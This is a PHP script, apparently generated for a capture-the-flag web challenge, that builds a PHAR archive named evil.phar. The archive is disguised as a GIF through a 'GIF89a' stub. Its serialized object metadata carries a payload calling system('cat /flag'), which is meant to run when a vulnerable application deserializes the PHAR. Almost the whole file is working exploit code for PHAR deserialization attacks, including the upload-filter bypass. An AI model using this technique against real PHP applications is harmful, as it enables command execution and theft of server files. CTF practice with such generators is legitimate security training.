<?php
// Auto-generated by phar_gen.py — 独立可运行脚本
// 用法: php -d phar.readonly=0 evil.phar.gen.php
error_reporting(0);
@unlink("/Users/kingpong/Forexam/ctfmd/Web/tools/evil.phar");

$phar = new Phar("/Users/kingpong/Forexam/ctfmd/Web/tools/evil.phar");
$phar->startBuffering();
$phar->addFromString("test.txt", "test");

class Evil {
    public $cmd;
}

$obj = new Evil();
    $obj->cmd = chr(13) . 'system(' . chr(39) . 'cat /flag' . chr(39) . ');';

$phar->setMetadata($obj);
$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>");
$phar->stopBuffering();

echo "phar generated: /Users/kingpong/Forexam/ctfmd/Web/tools/evil.phar (" . filesize("/Users/kingpong/Forexam/ctfmd/Web/tools/evil.phar") . " bytes)\n";

// 验证
$p = new Phar("/Users/kingpong/Forexam/ctfmd/Web/tools/evil.phar");
$meta = $p->getMetadata();
echo "class: " . get_class($meta) . "\n";
foreach (get_object_vars($meta) as $k => $v) {
    echo "  \$$k = " . bin2hex($v) . " (" . $v . ")\n";
}
